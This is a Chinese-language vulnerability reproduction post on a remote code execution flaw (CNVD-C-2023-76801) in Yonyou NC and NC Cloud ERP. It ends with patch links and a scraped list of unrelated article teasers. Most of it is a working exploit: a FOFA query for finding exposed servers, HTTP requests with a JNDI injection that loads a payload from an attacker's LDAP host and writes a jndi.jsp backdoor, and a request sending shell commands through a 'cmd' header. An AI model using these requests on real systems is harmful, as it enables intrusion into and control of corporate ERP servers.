【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
产品介绍
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
漏洞概述
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
影响范围
NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207
复现环境
FOFA:app="用友-NC-Cloud"
漏洞复现
POC(传参中的dnslog自行替换):
- POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
- Host:
- User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
- Accept-Encoding: gzip, deflate
- Accept: */*
- Connection: close
- Content-Type: application/x-www-formurlencoded
- Content-Length: 285
- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://sqb2c1.dnslog.cn/exp')}","webapps/nc_web/jndi.jsp"]}
利用思路:调用”nc.itf.iufo.IBaseSPService“服务中的"saveXStreamConfig"的方法,来接受对象和字符串,使用Java反射机制创建了一个javax.naming.InitialContext对象,并通过LDAP协议连接到指定的IP地址和端口,最后在根目录生成jsp恶意后门程序。
访问上传的文件 jndi.jsp。
- GET /jndi.jsp HTTP/1.1
- Host:
- User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
- Accept-Encoding: gzip, deflate
- Accept: */*
- Connection: close
- Content-Type: application/x-www-formurlencoded
EXP(VPSip请自行切换):
- POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
- Accept-Encoding: gzip, deflate
- Accept: */*
- Connection: close
- Content-Type: application/x-www-formurlencoded
- Content-Length: 285
- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}
JNDI注入工具开启监听后
执行命令:
- GET /jndi.jsp HTTP/1.1
- Host: 127.0.0.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
- cmd: whoami
在这不做演示。
修复建议
打对应补丁,重启服务,各版本补丁获取方式如下:
NC63方案:
补丁名称:NC63uapjs安全问题补丁
补丁编码:NCM_NC6.3_000_UAP_BTS_20230308_GP_268498360
https://dsp.yonyou.com/patchcenter/patchdetail/10231678268499522701/0/2
NC633方案:
补丁名称:NC633uapjs安全问题补丁
补丁编码:NCM_NC6.33_000_UAP_BTS_20230308_GP_268527193
https://dsp.yonyou.com/patchcenter/patchdetail/10231678268528400707/0/2
NC65方案:
补丁名称:NC65uapjs安全问题补丁
补丁编码:NCM_NC6.5_000_UAP_BTS_20230308_GP_269462199
https://dsp.yonyou.com/patchcenter/patchdetail/10231678269463403718/0/2
NCC1903方案:
补丁名称:NCC1903uapjs安全问题补丁
补丁编码:NCM_NCCLOUD1903_10_UAP_BTS_20230308_GP_268560504
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268561687890/0/2
NCC1909方案:
补丁名称:NCC1909uapjs安全问题补丁
补丁编码:NCM_NCCLOUD1909_10_UAP_BTS_20230308_GP_268596672
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268597774895/0/2
NCC2005方案:
补丁名称:NCC2005uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2020.05_10_UAP_BTS_20230308_GP_268622200
https://dsp.yonyou.com/patchcenter/patchdetail/10231678944167066463/0/2
NCC2105方案:
补丁名称:NCC2105uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2021.05_10_UAP_BTS_20230308_GP_268652747
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268653876905/0/2
NCC2111方案:
补丁名称:NCC2111uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2021.11_010_UAP_BTS_20230308_GP_268680318
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268681473910/0/2
YonBIP高级版2207方案:
补丁名称:YonBIP高级版2207uapjs安全问题补丁
补丁编码:NCM_YONBIP高级2207_010_UAP_BTS_20230308_GP_267337472
https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2
【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)的更多相关文章
- 漏洞复现——Apache HTTPD多后缀解析漏洞
漏洞原理:Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache Httpd这个特 ...
- 【阿菜漏洞复现】DeFi 平台 MonoX Finance 漏洞分析及复现
前言 2021 年 11 ⽉ 30 ⽇,DeFi 平台 MonoX Finance 遭遇攻击,损失共计约 3100 万美元. 造成本次攻击的漏洞主要有两个: 移除流动性的函数未对调用者进行检测,使得任 ...
- 漏洞复现——bash远程解析命令执行漏洞
漏洞描述:Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令,在一些cgi脚本中,数据是通过环境变量来传递的,这样就会形成该漏洞 漏洞原理:bash通过以函数名作为环境变量名,以“( ...
- 【漏洞复现】Office远程代码执行漏洞(CVE-2017-11882)
昨晚看到的有复现的文章,一直到今天才去自己复现了一遍,还是例行记录一下. POC: https://github.com/Ridter/CVE-2017-11882/ 一.简单的生成弹计算器的doc文 ...
- MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞)
漏洞介绍:MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏 ...
- 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
日期:2018-07-21 21:09:16 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell.查看文件.获取密码. 0x01.实验环境 攻击机 系统:macOS Sierra 10.12 ...
- 漏洞复现:Struts2 远程代码执行漏洞(S2-033)
docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2 ...
- Weblogic-SSRF漏洞复现
Weblogic-SSRF漏洞复现 一.SSRF概念 服务端请求伪造(Server-Side Request Forgery),是一种有攻击者构造形成有服务端发起请求的一个安全漏洞.一般情况下,SSR ...
- 威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件.除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐 ...
- 通达OA-2017版本漏洞复现
搭建环境 服务器 虚拟机系统版本:Windows Server 2016. 安装服务端 1.下载安装程序 这里我们下载的是2017版本的通达OA服务端: 2.安装程序 配置服务: 漏洞复现 1.任意文 ...
随机推荐
- PhotoView——支持图片缩放、平移、旋转的一个优雅的三方组件
简介 PhotoView是OpenAtom OpenHarmony(简称"OpenHarmony")系统的一款图片缩放及浏览的三方组件,用于声明式应用开发,支持图片缩放.平移.旋转 ...
- 记一次 .NET某管理局检测系统 内存暴涨分析
一:背景 1. 讲故事 前些天有位朋友微信找到我,说他们的WPF程序有内存泄漏的情况,让我帮忙看下怎么回事?并且dump也抓到了,网上关于程序内存泄漏,内存暴涨的文章不计其数,看样子这个dump不是很 ...
- HE琥珀虚颜破解自由安装程序教程(001)
HE琥珀虚颜破解自由安装程序教程(001) 前言 自从狗尾草跑路后,HE琥珀就没法用了,当前APP还没法破解,但是笔者找到了HE琥珀存在的一些漏洞,可以实现安装自己的APP. 所需工具 所需工具 1. ...
- 可视化库 pygal 无法保存成本地文件
问题:在使用可视化库 pygal 保存图像到本地时,出现报错 第一次报错是,提示没有 cairosvg 这个模块,所以直接通过 pip 安装 pip install cairosvg 安装完了以后 ...
- Android Compose 入门,深入底层源码分析
Android Compose 入门,深入底层源码分析 我是跟着AS官网学习的,但是官方的教程写的不是很详细.官网链接 首先创建一个Compose项目,目录结构是这样: ui -> theme ...
- 使用 K8S 部署 RSS 全套自托管解决方案- RssHub + Tiny Tiny Rss
前言 什么是 RSS? RSS 是一种描述和同步网站内容的格式,是使用最广泛的 XML 应用.RSS 搭建了信息迅速传播的一个技术平台,使得每个人都成为潜在的信息提供者.发布一个 RSS 文件后,这个 ...
- HDC2021技术分论坛:还有人不知道鸿蒙智联设备认证咋搞?
作者:maxiansheng,华为鸿蒙智联认证测试专家 2021年5月18日,华为正式宣布原Work With HUAWEI HiLink和Powered by HarmonyOS品牌升级为Harmo ...
- pytest接口自动化搭建经验
前言:目前公司的主要产品是一个web类型的产品:需要做一些自动化,目前的想法是只做接口自动化,不做ui的一个自动化,目前的思路是先对主流程做正常校验,后期再对每一个接口做校验: 一.版本信息: pyt ...
- 笔记本电脑上的聊天机器人: 在英特尔 Meteor Lake 上运行 Phi-2
对应于其强大的能力,大语言模型 (LLM) 需要强大的算力支撑,而个人计算机上很难满足这一需求.因此,我们别无选择,只能将它们部署至由本地或云端托管的性能强大的定制 AI 服务器上. 为何需要将 LL ...
- SRC信息收集方法论
"感谢您阅读本篇博客!如果您觉得本文对您有所帮助或启发,请不吝点赞和分享给更多的朋友.您的支持是我持续创作的动力,也欢迎留言交流,让我们一起探讨技术,共同成长!谢谢!" SRC信息 ...